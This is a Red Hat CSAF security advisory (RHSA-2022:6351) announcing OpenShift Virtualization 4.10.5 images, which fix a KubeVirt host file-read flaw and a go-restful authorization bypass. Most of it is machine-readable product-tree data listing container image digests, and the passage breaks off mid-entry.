"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: crypto/elliptic: panic caused by oversized scalar", }, ], }
rhsa-2022_6351
Vulnerability from csaf_redhat
Published
2022-09-06 14:00
Modified
2024-11-25 08:02
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.10.5 Images security and bug fix update
Notes
Topic
Red Hat OpenShift Virtualization release 4.10.5 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.
This advisory contains the following OpenShift Virtualization 4.10.5 images:
RHEL-8-CNV-4.10
===============
cluster-network-addons-operator-container-v4.10.5-1
kubemacpool-container-v4.10.5-1
virt-cdi-importer-container-v4.10.5-1
hyperconverged-cluster-operator-container-v4.10.5-1
hostpath-provisioner-operator-container-v4.10.5-1
virtio-win-container-v4.10.5-1
virt-cdi-cloner-container-v4.10.5-1
kubevirt-ssp-operator-container-v4.10.5-1
cnv-containernetworking-plugins-container-v4.10.5-1
hyperconverged-cluster-webhook-container-v4.10.5-1
virt-cdi-apiserver-container-v4.10.5-1
ovs-cni-plugin-container-v4.10.5-1
virt-cdi-uploadserver-container-v4.10.5-1
virt-cdi-uploadproxy-container-v4.10.5-1
virt-cdi-controller-container-v4.10.5-1
kubevirt-template-validator-container-v4.10.5-1
virt-cdi-operator-container-v4.10.5-1
hostpath-provisioner-container-v4.10.5-1
hostpath-csi-driver-container-v4.10.5-1
kubernetes-nmstate-handler-container-v4.10.5-1
ovs-cni-marker-container-v4.10.5-1
bridge-marker-container-v4.10.5-1
node-maintenance-operator-container-v4.10.5-1
cnv-must-gather-container-v4.10.5-2
virt-controller-container-v4.10.5-3
virt-api-container-v4.10.5-3
virt-handler-container-v4.10.5-3
virt-operator-container-v4.10.5-3
virt-artifacts-server-container-v4.10.5-3
virt-launcher-container-v4.10.5-3
libguestfs-tools-container-v4.10.5-3
hco-bundle-registry-container-v4.10.5-6
Security Fix(es):
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
* go-restful: Authorization Bypass Through User-Controlled Key (CVE-2022-1996)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.10.5 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization 4.10.5 images:\n\nRHEL-8-CNV-4.10\n===============\ncluster-network-addons-operator-container-v4.10.5-1\nkubemacpool-container-v4.10.5-1\nvirt-cdi-importer-container-v4.10.5-1\nhyperconverged-cluster-operator-container-v4.10.5-1\nhostpath-provisioner-operator-container-v4.10.5-1\nvirtio-win-container-v4.10.5-1\nvirt-cdi-cloner-container-v4.10.5-1\nkubevirt-ssp-operator-container-v4.10.5-1\ncnv-containernetworking-plugins-container-v4.10.5-1\nhyperconverged-cluster-webhook-container-v4.10.5-1\nvirt-cdi-apiserver-container-v4.10.5-1\novs-cni-plugin-container-v4.10.5-1\nvirt-cdi-uploadserver-container-v4.10.5-1\nvirt-cdi-uploadproxy-container-v4.10.5-1\nvirt-cdi-controller-container-v4.10.5-1\nkubevirt-template-validator-container-v4.10.5-1\nvirt-cdi-operator-container-v4.10.5-1\nhostpath-provisioner-container-v4.10.5-1\nhostpath-csi-driver-container-v4.10.5-1\nkubernetes-nmstate-handler-container-v4.10.5-1\novs-cni-marker-container-v4.10.5-1\nbridge-marker-container-v4.10.5-1\nnode-maintenance-operator-container-v4.10.5-1\ncnv-must-gather-container-v4.10.5-2\nvirt-controller-container-v4.10.5-3\nvirt-api-container-v4.10.5-3\nvirt-handler-container-v4.10.5-3\nvirt-operator-container-v4.10.5-3\nvirt-artifacts-server-container-v4.10.5-3\nvirt-launcher-container-v4.10.5-3\nlibguestfs-tools-container-v4.10.5-3\nhco-bundle-registry-container-v4.10.5-6\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* go-restful: Authorization Bypass Through User-Controlled Key (CVE-2022-1996)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2022:6351", url: "https://access.redhat.com/errata/RHSA-2022:6351", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2070366", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2070366", }, { category: "external", summary: "2094982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094982", }, { category: "external", summary: "2099324", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099324", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "2118367", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2118367", }, { category: "external", summary: "2120061", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2120061", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6351.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.10.5 Images security and bug fix update", tracking: { current_release_date: "2024-11-25T08:02:28+00:00", generator: { date: "2024-11-25T08:02:28+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.1", }, }, id: "RHSA-2022:6351", initial_release_date: "2022-09-06T14:00:38+00:00", revision_history: [ { date: "2022-09-06T14:00:38+00:00", number: "1", summary: "Initial version", }, { date: "2022-09-06T14:00:38+00:00", number: "2", summary: "Last updated version", }, { date: "2024-11-25T08:02:28+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.10 for RHEL 8", product: { name: "CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.10::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", product: { name: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", product_id: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", product_identification_helper: { purl: "pkg:oci/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/bridge-marker&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", product: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", product_id: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", product_identification_helper: { purl: "pkg:oci/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", product: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", product_id: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", product_identification_helper: { purl: "pkg:oci/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", product: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", product_id: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", product_identification_helper: { purl: "pkg:oci/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8&tag=v4.10.5-2", }, }, }, { category: "product_version", name: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", product: { name: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", product_id: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", product_identification_helper: { purl: "pkg:oci/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry&tag=v4.10.5-6", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product_id: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver-rhel8&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product_id: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", product: { name: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", product_id: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", product_identification_helper: { purl: "pkg:oci/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubemacpool&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", product: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", product_id: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", product_identification_helper: { purl: "pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", product: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", product_id: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", product: { name: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", product_id: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", product: { name: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", product_id: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", product_identification_helper: { purl: "pkg:oci/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", product: { name: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", product_id: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", product_identification_helper: { purl: "pkg:oci/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", product: { name: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", product_id: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", product: { name: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", product_id: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", product: { name: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", product_id: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", product_identification_helper: { purl: "pkg:oci/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-api&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", product: { name: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", product_id: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", product_identification_helper: { purl: "pkg:oci/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", product: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", product_id: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", product: { name: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", product_id: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", product: { name: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", product_id: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", product: { name: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", product_id: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", product: { name: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", product_id: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", product_id: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy&tag=v4.10.5-1", }, }, }, { category: "product_version", name: 